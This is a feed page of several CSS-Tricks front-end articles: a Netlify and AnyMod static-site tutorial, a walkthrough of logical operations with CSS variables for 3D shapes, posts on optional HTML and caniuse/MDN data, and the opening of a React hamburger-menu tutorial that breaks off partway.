Front End Web Development

Fast Static Sites with Netlify and AnyMod

Css Tricks - Thu, 09/12/2019 - 4:21am

In about 10 minutes, we'll set up a workflow that makes static sites dead simple.

You'll get the following:

  • Free https
  • Free or cheap hosting
  • Build sites quickly
  • Edit with live reload
  • Edit when you’ve forgotten everything in 6 months
Start: signups

We can get all this by using Netlify (really simple static hosting) along with AnyMod (100s of website sections).

Set up deploy pipeline

We’ll create a basic HTML file, track it with GitHub, and then auto-deploy with Netlify.

(If you prefer a manual setup, you can skip this step and instead deploy to Netlify by dragging/dropping into the Netlify folder.)

1. Create an empty repo in GitHub.

Go to https://github.com/new and Name it netlify-anymod:

GitHub setup 2. Connect Netlify to your repo.

You will do this from the Netlify start screen.

Netlify setup 3. Create a folder on your computer and add a file named index.html.

You can run the following in your terminal to do this:

mkdir netlify-anymod cd netlify-anymod touch index.html

Now edit the index.html file to add some basic HTML structure:

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="ie=edge" /> <title>Netlify & AnyMod | CSS Tricks</title> </head> <body> Hello, World! </body> </html> 4. Track it with git and deploy to GitHub git init git remote add origin https://github.com/tyrw/netlify-anymod.git git add -A git commit -m "Initial commit" git push --set-upstream origin master

Note: use your own repo URL for git remote add origin).

Check your Netlify URL after a minute or so, and your site should be live!

Live site Add section "mods"

Now that we have our deploy setup, we can build the page itself. We'll do this with ready-to-use modules ("mods") on AnyMod.

There are a lot to choose from, but we'll use mods from the Editorial theme:

Navigation

(View this mod)

Intro / Hero unit

(View this mod)

Form

(View this mod)

Image gallery

(View this mod)

Clone and add mods

Add these mods by clicking "Clone" for each one and then scroll down and copy/paste the installation code into the index.html file. Also copy and paste your project script at the top.

Your index.html should now look something like this:

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="ie=edge" /> <title>Netlify & AnyMod | CSS Tricks</title> <!-- AnyMod --> <script id="AnyMod-script"> (function (m,o,d,u,l,a,r,i,z,e) { u[m]={Project:o,rq:[],Opts:r,ready:function(j){u[m].rq.push(j)}};function j(s){return encodeURIComponent(btoa(s))};z=l.getElementById(m+'-'+a);r=u.location; e=[d+'/page/'+o+'/'+j(r.pathname)+'/'+j(r.host)+'?t='+Date.now(),d];e.map(function(w){i=l.createElement(a);i.defer=1;i.src=w;z.parentNode.insertBefore(i,z);}); })('AnyMod','82PEPN','https://cdn.anymod.com/v2',window,document,'script',{ toolkit: true, tips: true, priority: 3 }); </script> <!-- /AnyMod --> </head> <body> <!-- Professional side nav --> <div id="anymod-mlrnbm"></div> <!-- Intro section --> <div id="anymod-ormard"></div> <!-- Contact form --> <div id="anymod-ralmam"></div> <!-- Card section --> <div id="anymod-balmaa"></div> </body> </html>

And the page is ready to go.

Now save and push to GitHub to deploy the site:

git add -A git commit -m "Added mods" git push origin

Wait a minute, and your site should be ready to use. Here is the demo page.

See Demo

Editing content

Now you can live edit the content and code for each mod. When viewing your own page (while also logged into AnyMod), you see a pencil on the right side:

AnyMod pencil

Click the pencil and choose a mod. Now try making some edits to the content (or code) and notice that it updates on the page automatically in real time.

AnyMod live edit

You can use this method to make edits now or in 6 months when you've forgotten how the project is set up.

Form

The form also works automatically. Try submitting a message on your own page; the response will be emailed to you right away.

Conclusion

You now have a great way to build fast, reliable, secure static sites.

Remember: with great power comes great responsibility.

The post Fast Static Sites with Netlify and AnyMod appeared first on CSS-Tricks.

Logical Operations with CSS Variables

Css Tricks - Wed, 09/11/2019 - 4:26am

Very often, while using switch variables (a variable that's either 0 or 1, a concept that's explained in a greater detail in in this post), I wish I could perform logical operations on them. We don't have functions like not(var(--i)) or and(var(--i), var(--k)) in CSS, but we can emulate these and more with arithmetic operations in a calc() function.

This article is going to show you what calc() formulas we need to use for each logical operation and explain how and why they are used with a couple of use cases that lead to the writing of this article.

How: the formulas not

This is a pretty straightforward one: we subtract the switch variable (let's call it --j) from 1:

--notj: calc(1 - var(--j))

If --j is 0, then --notj is 1 (1 - 0). If j is 1, then --notj is 0 (1 - 1).

and

Now, if you've ever taken electronics classes (particularly something like Programmed Logic Systems or Integrated Circuits), then you already know what formula we need to use here. But let's not jump straight into it.

The and of two operands is true if and only if both are true. The two operands in our case are two switch variables (let's call them --k and --i). Each of them can be either 0 or 1, independently of the other. This means we can be in one out of four possible scenarios:

  • --k: 0, --i: 0
  • --k: 0, --i: 1
  • --k: 1, --i: 0
  • --k: 1, --i: 1

The result of the and operation is 1 if both our switch variables are 1 and 0 otherwise. Looking at it the other way, this result is 0 if at least one of the two switch variables is 0.

Now you need to think of it this way: the result of what arithmetic operation is 0 if at least one of the two operands is 0? That's multiplication, as multiplying anything by 0 gives us 0!

So, our --and formula is:

--and: calc(var(--k)*var(--i))

Considering each of our four possible scenarios, we have:

  • for --k: 0, --i: 0, we have that --and is 0 (0*0)
  • for --k: 0, --i: 1, we have that --and is 0 (0*1)
  • for --k: 1, --i: 0, we have that --and is 0 (1*0)
  • for --k: 1, --i: 1, we have that --and is 1 (1*1)
nand

Since nand is not and, we need to replace the --j in the not formula with the formula for and:

--nand: calc(1 - var(--k)*var(--i))

For each of our four possible scenarios, we get:

  • for --k: 0, --i: 0, we have that --nand is 1 (1 - 0*0 = 1 - 0)
  • for --k: 0, --i: 1, we have that --nand is 1 (1 - 0*1 = 1 - 0)
  • for --k: 1, --i: 0, we have that --nand is 1 (1 - 1*0 = 1 - 0)
  • for --k: 1, --i: 1, we have that --nand is 0 (1 - 1*1 = 1 - 1)
or

The result of the or operation is 1 if at least one of our switch variables is 1 and 0 otherwise (if both of them are 0).

The first instinct here is to go for addition, but while that gives us 0 if both --k and --i are 0 and 1 if one is 0 and the other one is 1, it gives us 2 if both of them are 1. So that doesn't really work.

But we can use the good old De Morgan's laws, one of which states:

not (A or B) = (not A) and (not B)

This means the result of the or operation is the negation of the and operation between the negations of --k and --i. Putting this into CSS, we have:

--or: calc(1 - (1 - var(--k))*(1 - var(--i)))

For each scenario, we get:

  • for --k: 0, --i: 0, we have that --or is 0 (1 - (1 - 0)*(1 - 0) = 1 - 1*1 = 1 - 1)
  • for --k: 0, --i: 1, we have that --or is 1 (1 - (1 - 0)*(1 - 1) = 1 - 1*0 = 1 - 0)
  • for --k: 1, --i: 0, we have that --or is 1 (1 - (1 - 1)*(1 - 0) = 1 - 0*1 = 1 - 0)
  • for --k: 1, --i: 1, we have that --or is 1 (1 - (1 - 1)*(1 - 1) = 1 - 0*0 = 1 - 0)
nor

Since nor is not or, we have:

--nor: calc((1 - var(--k))*(1 - var(--i)))

For each of our four possible scenarios, we get:

  • for --k: 0, --i: 0, we have that --nor is 1 ((1 - 0)*(1 - 0) = 1*1)
  • for --k: 0, --i: 1, we have that --nor is 0 ((1 - 0)*(1 - 1) = 1*0)
  • for --k: 1, --i: 0, we have that --nor is 0 ((1 - 1)*(1 - 0) = 0*1)
  • for --k: 1, --i: 1, we have that --nor is 0 ((1 - 1)*(1 - 1) = 0*0)
xor

The result of the xor operation is 1 when one of the two operands is 1 and the other one is 0. This feels trickier at first, but, if we think this means the two operands need to be different for the result to be 1 (otherwise it's 0), we stumble upon the right arithmetic operation to use inside calc(): subtraction!

If --k and --i are equal, then subtracting --i from --k gives us 0. Otherwise, if we have --k: 0, --i: 1, the result of the same subtraction is -1; if we have --k: 1, --i: 0, the result is 1.

Close, but not quite! We get the result we want in three out of four scenarios, but we need to get 1, not -1 in the --k: 0, --i: 1 scenario.

However, one thing that -1, 0 and 1 have in common is that multiplying them with themselves gives us their absolute value (which is 1 for both -1 and 1). So the actual solution is to multiply this difference with itself:

--xor: calc((var(--k) - var(--i))*(var(--k) - var(--i)))

Testing each of our four possible scenarios, we have:

  • for --k: 0, --i: 0, we have that --xor is 0 ((0 - 0)*(0 - 0) = 0*0)
  • for --k: 0, --i: 1, we have that --xor is 1 ((0 - 1)*(0 - 1) = -1*-1)
  • for --k: 1, --i: 0, we have that --xor is 1 ((1 - 0)*(1 - 0) = 1*1)
  • for --k: 1, --i: 1, we have that --xor is 0 ((1 - 1)*(1 - 1) = 0*0)
Why: Use cases

Let's see a couple of examples that make use of logical operations in CSS. Note that I won't detail other aspects of these demos as they're outside the scope of this particular article.

Hide disabled panel only on small screens

This is a use case I came across while working on an interactive demo that lets users control various parameters to change a visual result. For more knowledgeable users, there's also a panel of advanced controls that's disabled by default. It can, however, be enabled in order to get access to manually controlling even more parameters.

Since this demo is supposed to be responsive, the layout changes with the viewport. We also don't want things to get crammed on smaller screens if we can avoid it, so there's no point in showing the advanced controls if they're disabled and we're in the narrow screen case.

The screenshot collage below shows the results we get for each the four possible scenarios.

Collage of the possible cases.

So let's see what this means in terms of CSS!

First off, on the <body>, we use a switch that goes from 0 in the narrow screen case to 1 in the wide screen case. We also change the flex-direction this way (if you want a more detailed explanation of how this works, check out my second article on DRY switching with CSS variables).

body { --k: var(--wide, 0); display: flex; flex-direction: var(--wide, column); @media (orientation: landscape) { --wide: 1 } }

We then have a second switch on the advanced controls panel. This second switch is 0 if the checkbox is unchecked and 1 if the checkbox is :checked. With the help of this switch, we give our advanced controls panel a disabled look (via a filter chain) and we also disable it (via pointer-events). Here, not comes in handy, as we want to decrease the contrast and the opacity in the disabled case:

.advanced { --i: var(--enabled, 0); --noti: calc(1 - var(--i)); filter: contrast(calc(1 - var(--noti)*.9)) opacity(calc(1 - var(--noti)*.7)); pointer-events: var(--enabled, none); [id='toggle']:checked ~ & { --enabled: 1 } }

We want the advanced controls panel to stay expanded if we're in the wide screen case (so if --k is 1), regardless of whether the checkbox is :checked or not, or if the checkbox is :checked (so if --i is 1), regardless of whether we're in the wide screen case or not.

This is precisely the or operation!

So we compute an --or variable:

.advanced { /* same as before */ --or: calc(1 - (1 - var(--k))*(1 - var(--i))); }

If this --or variable is 0, this means we're in the narrow screen case and our checkbox is unchecked, so we want to zero the height of the advanced controls panel and also its vertical margin:

.advanced { /* same as before */ margin: calc(var(--or)*#{$mv}) 0; height: calc(var(--or)*#{$h}); }

This gives us the desired result (live demo).

Use the same formulas to position multiple faces of a 3D shape

This is a use case I came across while working on the personal project of CSS-ing the Johnson solids this summer.

Let's take a look at one of these shapes, for example, the gyroelongated pentagonal rotunda (J25), in order to see how logical operations are useful here.

The shape we want to get.

This shape is made up out of a pentagonal rotunda without the big decagonal base and a decagonal antiprism without its top decagon. The interactive demo below shows how these two components can be built by folding their nets of faces into 3D and then joined to give us the shape we want.

See the Pen by thebabydino (@thebabydino) on CodePen.

As it can be seen above, the faces are either a part of the antiprism or a part of the rotunda. This is where we introduce our first switch variable --i. This is 0 for the faces that are a part of the antiprism and 1 for the faces that are a part of the rotunda. The antiprism faces have a class of .mid because we can add another rotunda to the other antiprism base and then the antiprism would be in the middle. The rotunda faces have a class of .cup because this part does look like a coffee cup... without a handle!

The rotunda looks like an upside down up cup without a handle. .mid { --i: 0 } .cup { --i: 1 }

Focusing only on the lateral faces, these can have a vertex pointing up or down. This is where we introduce our second variable --k. This is 0 if they have a vertex pointing up (such faces have a .dir class) and 1 if they're reversed and have a vertex pointing down (these faces have a class of .rev)

.dir { --k: 0 } .rev { --k: 1 }

The antiprism has 10 lateral faces (all triangles) pointing up, each attached to an edge of its decagonal base that's also a base for the compound shape. It also has 10 lateral faces (all triangles as well) pointing down, each attached to an edge of its other decagonal base (the one that's also the decagonal base of the rotunda and is therefore not a base for the compound shape).

The rotunda has 10 lateral faces pointing up, alternating triangles and pentagons, each attached to the decagonal base that's also a base for the antiprism (so it's not a base for the compound shape as well). It also has 5 lateral faces, all triangles, pointing down, each attached to an edge of its pentagonal base.

The interactive demo below allows us to better see each of these four groups of faces by highlighting only one at a time. You can use the arrows at the bottom to pick which group of faces gets highlighted. You can also enable the rotation around the y axis and change the shape's tilt.

See the Pen by thebabydino (@thebabydino) on CodePen.

As previously mentioned, the lateral faces can be either triangles or pentagons:

.s3gon { --p: 0 } .s5gon { --p: 1 }

Since all of their lateral faces (.lat) of both the antiprism and the rotunda have one edge in common with one of the two base faces of each shape, we call these common edges the base edges of the lateral faces.

The interactive demo below highlights these edges, their end points and their mid points and allows viewing the shapes from various angles thanks to the auto-rotations around the y axis which can be started/ paused at any moment and to the manual rotations around the x axis which can be controlled via the sliders.

See the Pen by thebabydino (@thebabydino) on CodePen.

In order to make things easier for ourselves, we set the transform-origin of the .lat faces on the middle of their base edges (bottom horizontal edges).

Highlighting the base edges and their midpoints (live).

We also make sure we position these faces such as to have these midpoints dead in the middle of the scene element containing our entire 3D shape.

Having the transform-origin coincide with the midpoint the base edge means that any rotation we perform on a face is going to happen around the midpoint of its base edge, as illustrated by the interactive demo below:

See the Pen by thebabydino (@thebabydino) on CodePen.

We place our lateral faces where we want them to be in four steps:

  1. We rotate them around their y axis such that their base edges are now parallel to their final positions. (This also rotates their local system of coordinates — the z axis of an element always points in the direction that element faces.)
  2. We translate them such that their base edges coincide with their final positions (along the edges of the base faces of the two components).
  3. If they need to have a vertex pointing down, we rotate them around their z axis by half a turn.
  4. We rotate them around their x axis into their final positions

These steps are illustrated by the interactive demo below, where you can go through them and also rotate the entire shape (using the play/pause button for the y axis rotation and the slider for the x axis rotation).

See the Pen by thebabydino (@thebabydino) on CodePen.

The y axis rotation value is based mostly on the face indices and less on our switch variables, though it depends on these as well.

The structure is as follows:

- var n = 5; //- number of edges/ vertices of small base section.scene //- 3D shape element .s3d //- the faces, each a 2D shape element (.s2d) //- lateral (.lat) antiprism (.mid) faces, //- first half pointing up (.dir), others pointing down (.rev) //- all of them being triangles (.s3gon) - for(var j = 0; j < 4*n; j++) .s2d.mid.lat.s3gon(class=j < 2*n ? 'dir' : 'rev') //- lateral (.lat) rotunda (.cup) faces that point up (.dir), //- both triangles (.s3gon) and pentagons (.s5gon) - for(var j = 0; j < n; j++) .s2d.cup.lat.s3gon.dir .s2d.cup.lat.s5gon.dir //- lateral (.lat) rotunda (.cup) faces that point down (.rev) //- all of them triangles (.s3gon) - for(var j = 0; j < n; j++) .s2d.cup.lat.s3gon.rev //- base faces, //- one for the antiprism (.mid), //- the other for the rotunda (.cup) .s2d.mid.base(class=`s${2*n}gon`) .s2d.cup.base(class=`s${n}gon`)

Which gives us the following HTML:

<section class="scene"> <div class="s3d"> <!-- LATERAL faces --> <div class="s2d mid lat s3gon dir"></div> <!-- 9 more identical faces, so we have 10 lateral antiprism faces pointing up --> <div class="s2d mid lat s3gon rev"></div> <!-- 9 more identical faces, so we have 10 lateral antiprism faces pointing down --> <div class="s2d cup lat s3gon dir"></div> <div class="s2d cup lat s5gon dir"></div> <!-- 4 more identical pairs, so we have 10 lateral rotunda faces pointing up --> <div class="s2d cup lat s3gon rev"></div> <!-- 4 more identical faces, so we have 5 lateral rotunda faces pointing down --> <!-- BASE faces --> <div class="s2d mid base s10gon"></div> <div class="s2d cup base s5gon"></div> </div> </section>

This means faces 0... 9 are the 10 lateral antiprism faces pointing up, faces 10... 19 are the 10 lateral antiprism faces pointing down, faces 20... 29 are the 10 lateral rotunda faces pointing up and faces 30... 34 are the 5 lateral rotunda faces pointing down.

So what we do here is set an index --idx on the lateral faces.

$n: 5; // number of edges/ vertices of small base .lat { @for $i from 0 to 2*$n { &:nth-child(#{2*$n}n + #{$i + 1}) { --idx: #{$i} } } }

This index starts at 0 for each group of faces, which means the indices for faces 0... 9, 10... 19 and 20... 29 go from 0 through 9, while the indices for faces 30... 34 go from 0 through 4. Great, but if we just multiply these indices with the base angle1 of the common decagon to get the y axis rotation we want at this step:

--ay: calc(var(--idx)*#{$ba10gon}); transform: rotatey(var(--ay))

...then we get the following final result. I'm showing the final result here because it's a bit difficult to see what's wrong by looking at the intermediate result we get after only applying the rotation around the y axis.

See the Pen by thebabydino (@thebabydino) on CodePen.

This is... not quite what we were going for!

So let's see what problems the above result has and how to solve them with the help of our switch variables and boolean operations on them.

The first issue is that the lateral antiprism faces pointing up need to be offset by half of a regular decagon's base angle. This means adding or subtracting .5 from --idx before multiplying with the base angle, but only for these faces.

See the Pen by thebabydino (@thebabydino) on CodePen.

The faces we want to target are the faces for which both of --i and --k are 0, so what we need here is multiply the result of their nor with .5:

--nor: calc((1 - var(--k))*(1 - var(--i))); --j: calc(var(--idx) + var(--nor)*.5); --ay: calc(var(--j)*#{$ba10gon}); transform: rotatey(var(--ay));

The second issue is that the lateral rotunda faces pointing down are not distributed as they should be, such that each of them has a base edge in common with the base pentagon and the vertex opposing the base in common with the triangular rotunda faces pointing up. This means multiplying --idx by 2, but only for these faces.

See the Pen by thebabydino (@thebabydino) on CodePen.

What we're targeting now are the faces for which both --i and --k are 1 (so the faces for which the result of the and operation is 1), so what we need is to multiply --idx with 1 plus their and:

--and: calc(var(--k)*var(--i)); --nor: calc((1 - var(--k))*(1 - var(--i))); --j: calc((1 + var(--and))*var(--idx) + var(--nor)*.5); --ay: calc(var(--j)*#{$ba10gon}); transform: rotatey(var(--ay));

The next step is the translation for which we use translate3d(). We don't move any of our faces left or right, so the value along the x axis is always 0. We do move them however vertically (along the y axis) and forward (along the z axis)

Vertically, we want the cup faces that will later get rotated to point down to have their base edge in the plane of the small (pentagonal) base of the cup (and of the compound shape). This means the faces for which --i is 1 and --k is 1 get moved up (negative direction) by half the total height of the compound shape (a total height which we have computed to be $h). So we need the and operation here.

// same as before --and: calc(var(--i)*var(--k)); --y: calc(var(--and)*#{-.5*$h}); transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

We also want all the other cup faces as well as the antiprism faces that will eventually point down to have their base edge in the common plane between the cup and the antiprism. This means the faces for which --i is 1 and --k is 0 as well as the faces for which --i is 0 and --k is 1 get translated down (positive direction) by half the height of the compound shape and then back up (negative direction) by the height of the antiprism ($h-mid). And what do you know, this is the xor operation!

// same as before --xor: calc((var(--k) - var(--i))*(var(--k) - var(--i))); --and: calc(var(--i)*var(--k)); --y: calc(var(--xor)*#{.5*$h - $h-mid} - var(--and)*#{.5*$h}); transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

Finally, we want the antiprism faces that will remain pointing up to be in the bottom base plane of the compound shape (and of the antiprism). This means the faces for which --i is 0 and --k is 0 get translated down (positive direction) by half the total height of the compound shape. So what we use here is the nor operation!

// same as before --nor: calc((1 - var(--k))*(1 - var(--i))); --xor: calc((var(--k) - var(--i))*(var(--k) - var(--i))); --and: calc(var(--i)*var(--k)); --y: calc(var(--nor)*#{.5*$h} + var(--xor)*#{.5*$h - $h-mid} - var(--and)*#{.5*$h}); transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

See the Pen by thebabydino (@thebabydino) on CodePen.

Along the z direction, we want to move the faces such that their base edges coincide with the edges of the base faces of the compound shape or the edges of the common base (which is not a face of the compound shape) shared by the two 3D components. For the top faces of the cup (which we later rotate to point down), the placement is on the edges of a pentagon, while for all the other faces of the compound shape, the placement is on the edges of a decagon.

This means the faces for which --i is 1 and --k is 1 get translated forward by the inradius of the pentagonal base while all the other faces get translated forward by the inradius of a decagonal base. So the operations we need here are and and nand!

// same as before --and: calc(var(--i)*var(--k)); --nand: calc(1 - var(--and)); --z: calc(var(--and)*#{$ri5gon} + var(--nand)*#{$ri10gon}); transform: rotatey(var(--ay)) translate3d(0, var(--y, 0), var(--z, 0));

See the Pen by thebabydino (@thebabydino) on CodePen.

Next, we want to make all .rev (for which --k is 1) faces point down. This is pretty straightforward and doesn't require any logical operation, we just need to add a half a turn rotation around the z axis to the transform chain, but only for the faces for which --k is 1:

// same as before --az: calc(var(--k)*.5turn); transform: rotatey(var(--ay)) translate3d(0, var(--y), var(--z)) rotate(var(--az));

See the Pen by thebabydino (@thebabydino) on CodePen.

The pentagonal faces (for which --p is 1) are then all rotated around the x axis by a certain angle:

--ax: calc(var(--p)*#{$ax5});

In the case of the triangular faces (for which --p is 0, meaning we need to use --notp), we have a certain rotation angle for the faces of the antiprism ($ax3-mid), another angle for the faces of the rotunda that point up ($ax3-cup-dir) and yet another angle for the rotunda faces pointing down ($ax3-cup-red).

The antiprism faces are those for which --i is 0, so we need to multiply their corresponding angle value with --noti here. The rotunda faces are those for which --i is 1, and out of these, the ones pointing up are those for which --k is 0 and the ones pointing down are those for which --k is 1.

--notk: calc(1 - var(--k)); --noti: calc(1 - var(--i)); --notp: calc(1 - var(--p)); --ax: calc(var(--notp)*(var(--noti)*#{$ax3-mid} + var(--i)*(var(--notk)*#{$ax3-cup-dir} + var(--k)*#{$ax3-cup-rev})) + var(--p)*#{$ax5}); transform: rotatey(var(--ay)) translate3d(0, var(--y), var(--z)) rotate(var(--az)) rotatex(var(--ax));

This gives us the final result!

See the Pen by thebabydino (@thebabydino) on CodePen.

1 For any regular polygon (such as any of the faces of our shapes), the arc corresponding to one edge, as well as the angle between the circumradii to this edge's ends (our base angle) is a full circle (360°) over the number of edges. In the case of an equilateral triangle, the angle is 360°/3 = 120°. For a regular pentagon, the angle is 360°/5 = 72°. For a regular decagon, the angle is 360°/10 = 36°. ↪️

See the Pen by thebabydino (@thebabydino) on CodePen.

The post Logical Operations with CSS Variables appeared first on CSS-Tricks.

Some HTML is “Optional”

Css Tricks - Wed, 09/11/2019 - 4:22am

There is a variety of HTML that you can just leave out of the source HTML and it's still valid markup.

Doesn't this look weird?

<p>Paragraph one. <p>Paragraph two. <p>Paragraph three.

It does to me, but the closing </p> tags are optional. The browser will detect it needs them and manifest correctly in the DOM anyway.

This probably happens to HTML you write and you don't even know it. For example...

<table> <tr> <td></td> </tr> </table>

That looks perfectly fine to me, but the browser will inject a <tbody> in there around that <tr> for you. Optional in HTML, but the DOM will put it in anyway.

Heck, you don't really even need a <body> in the same fashion! Jens Oliver Meiert shares more:

<link rel=stylesheet href=default.css>

Some attributes are "optional" too in the sense that they have defaults you can leave out. For example, a <button> is automatically <button type="submit">.

Jens further argues that these are almost considered optimizations, as it reduces file size and thus network speed.

Me, I don't like looking at HTML like that. Makes me nervous, since there are actual situations that screw up if you don't do it right. Not all file names can be left unquoted. Sometimes, leaving off closing tags means enveloping a sibling element in a way you didn't expect. I'd even sacrifice a tiny smidge of performance for a more resilient site. Sorta like how I know that * {} isn't a particularly efficient selector, but worrying about CSS selector performance is misplaced worry in most cases (the speed difference is negligible).

I actually quite like JSX in how strict it forces you to write "HTML." That strictness helps code formatting (e.g. Prettier) too, as a bonus.

But hey, a perf gain is a perf gain, so I wouldn't say no to tooling that automatically does this stuff to compiled output. That's apparently something HTMLminifier can do.

The post Some HTML is “Optional” appeared first on CSS-Tricks.

Caniuse and MDN compatibility data collaboration

Css Tricks - Tue, 09/10/2019 - 9:51am

Second only to "silly GIFs," I'd guess screenshots of caniuse are the most common slide graphic at web conferences. It's become the ultimate source for looking at web compatibility data in the hearts and minds of web developers.

Can I use CSS filter in Firefox? Yes. Can I use the filter() function? No.

But of course, MDN has incredible web platform documentation that also includes compatibility data. So it's nice to see them collaborate. And not just theoretically — it's already happening.

Florian Scholz and Alexis Deveria:

Before we began our collaboration, the caniuse website only displayed results for features available in the caniuse database. Now all search results can include support tables for MDN compat data. This includes data types already found on caniuse, specifically the HTML, CSS, JavaScript, Web API, SVG & and HTTP categories. By adding MDN data, the caniuse support table count expands from roughly 500 to 10,500 tables! Developers’ caniuse queries on what’s supported where will now have significantly more results.

Massive upgrade, already live on the site. I absolutely love real collaboration like this when it actually happens. I remember back in 2012 when WebPlatform.org launched and every single major web company gave lip service that they were going to contribute and consolidate their documentation there. Sounded too good to be true. Launched before that work actually happened. Died unglamorously a few years later.

The caniuse database, I believe, is basically this 2MB JSON file on GitHub. We use that right here on CSS-Tricks. We pull it in and use the data in it to display our support tables, crediting caniuse while we do it.

Here's backdrop-filter:

This browser support data is from Caniuse, which has more detail. A number indicates that browser supports the feature at that version and up.

DesktopChromeOperaFirefoxIEEdgeSafari76NoNoNo179*Mobile / TabletiOS SafariOpera MobileOpera MiniAndroidAndroid ChromeAndroid Firefox9.0-9.2*NoNo76NoNo

It doesn't sound like the MDN data is going to make its way into that JSON, so I guess my big hope is that that dataset continues to be updated, or that if it is someday replaced, it is in a place that is similarly easy to access.

I totally get why they are just combining the data sources out of the gate, as MDN digs into individual features in a way that caniuse typically doesn't. For example, the individual values for justify-content are super complicated!

I imagine that kind of detail might require a deeper architectural change that wasn't right for a Version 1 integration.

Direct Link to ArticlePermalink

The post Caniuse and MDN compatibility data collaboration appeared first on CSS-Tricks.

Hamburger Menu with a Side of React Hooks and Styled Components

Css Tricks - Tue, 09/10/2019 - 4:35am

We all know what a hamburger menu is, right? When the pattern started making its way into web designs, it was both mocked and applauded for its minimalism that allows main menus to be tucked off screen, particularly on mobile where every pixel of space counts.

CSS-Tricks is all about double the meat.

Love ‘em or hate ‘em, hamburger menus are here and likely will be for some time to come. The problem is how to implement them. Sure, they look simple and straightforward, but they can be anything but. For example, should they be paired with a label? Are they more effective on the left or right side of the screen? How do we tackle closing those menus, whether by click or touch? Should the icon be an SVG, font, Unicode character, or pure CSS? What about a meatless option?

I wanted to build one of those but failed to find a simple solution. Most solutions are based on libraries, like reactjs-popup or react-burger-menu. They are great, but for more complex solutions. What about the core use case of a three-line menu that simply slides a panel out from the side of the screen when it’s clicked, then slides the panel back in when it’s clicked again?

I decided to build my own simple hamburger with sidebar. No pickles, onions or ketchup. Just meat, bun, and a side of menu items.

Are you ready to create it with me?

View on CodePen View on GitHub Here’s what we’re making

See the Pen
Burger menu with React hooks and styled-components
by Maks Akymenko (@maximakymenko)
on CodePen.

We’re building use React for this tutorial because it seems like a good use case for it: we get a reusable component and a set of hooks we can extend to handle the click functionality.

Spin up a new React project

Let’s spin up a new project using create-react-app, change to that folder directory and add styled-components to style the UI:

npx create-react-app your-project-name cd your-project-name yarn add styled-components Add basic styles

Open the newly created project in your favorite code editor and start adding basic styles using styled-components. In your src directory, create a file called global.js. It will contain styles for the whole app. You can write your own or just copy what I ended up doing:

// global.js import { createGlobalStyle } from 'styled-components'; export const GlobalStyles = createGlobalStyle` html, body { margin: 0; padding: 0; } *, *::after, *::before { box-sizing: border-box; } body { align-items: center; background: #0D0C1D; color: #EFFFFA; display: flex; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; height: 100vh; justify-content: center; text-rendering: optimizeLegibility; } `

This is only a part of global styles, the rest of it you can find here.

The CreateGlobalStyle function is generally used for creating global styles that are exposed to the whole app. We’ll import it so we have access to these styles as we go.

The next step is to add a theme file that holds all our variables. Create a theme.js file in the src directory and add following:

// theme.js export const theme = { primaryDark: '#0D0C1D', primaryLight: '#EFFFFA', primaryHover: '#343078', mobile: '576px', } Add layout, menu and hamburger components &#x1f354;

Go to your App.js file. We’re going to wipe everything out of there and create the main template for our app. Here’s what I did. You can certainly create your own.

// App.js import React from 'react'; import { ThemeProvider } from 'styled-components'; import { GlobalStyles } from './global'; import { theme } from './theme'; function App() { return ( <ThemeProvider theme={theme}> <> <GlobalStyles /> <div> <h1>Hello. This is burger menu tutorial</h1> <img src="https://image.flaticon.com/icons/svg/2016/2016012.svg" alt="burger icon" /> <small>Icon made by Freepik from www.flaticon.com</small> </div> </> </ThemeProvider> ); } export default App;

Don’t forget to add the line with the small tag. That’s how we credit flaticon.comhttp://flaticon.com) authors for the provided icon.

Here’s what we’ve got up to this point:

Let me explain a little bit. We imported ThemeProvider, which is a wrapper component that uses the Context API behind the scenes to make our theme variables available to the whole component tree.

We also imported our GlobalStyles and passed them as a component to our app, which means that our application now has access to all global styles. As you can see, our GlobalStyles component is inside ThemeProvider which means we can already make some minor changes in it.

Go to global.js and change the background and color properties to use our defined variables. This helps us implement a theme rather than using fixed values that are difficult to change.

// global.js background: ${({ theme }) => theme.primaryDark}; color: ${({ theme }) => theme.primaryLight};

We destructure our theme from props. So, instead of writing props.theme each time, we’re using a bunch of brackets instead. I’ll repeat myself: the theme is available because we’ve wrapped our global styles with ThemeProvider.

Create Burger and Menu components

Create a components folder inside the src directory and add two folders in there: Menu and Burger, plus an index.js file.

index.js will be used for one purpose: allow us to import components from one file, which is very handy, especially when you have a lot of them.

Now let’s create our components. Each folder will contain three files.

What’s up with all the files? You’ll see the benefit of a scalable structure soon enough. It worked well for me in a couple of projects, but here is good advice how to create scalable structure.

Go to the Burger folder and create Burger.js for our layout. Then add Burger.styled.js, which will contain styles, and index.js, which will be exporting the file.

// index.js export { default } from './Burger';

Feel free to style burger toggle in a way you want, or just paste these styles:

// Burger.styled.js import styled from 'styled-components'; export const StyledBurger = styled.button` position: absolute; top: 5%; left: 2rem; display: flex; flex-direction: column; justify-content: space-around; width: 2rem; height: 2rem; background: transparent; border: none; cursor: pointer; padding: 0; z-index: 10; &:focus { outline: none; } div { width: 2rem; height: 0.25rem; background: ${({ theme }) => theme.primaryLight}; border-radius: 10px; transition: all 0.3s linear; position: relative; transform-origin: 1px; } `;

The transform-origin property will be needed later to animate the menu it toggles between open and closed states.

After adding the styles, go to Burger.js and add the layout:

// Burger.js import React from 'react'; import { StyledBurger } from './Burger.styled'; const Burger = () => { return ( <StyledBurger> <div /> <div /> <div /> </StyledBurger> ) } export default Burger;

After that look at the left top corner. Do you see it?

Time to do the same with the Menu folder:

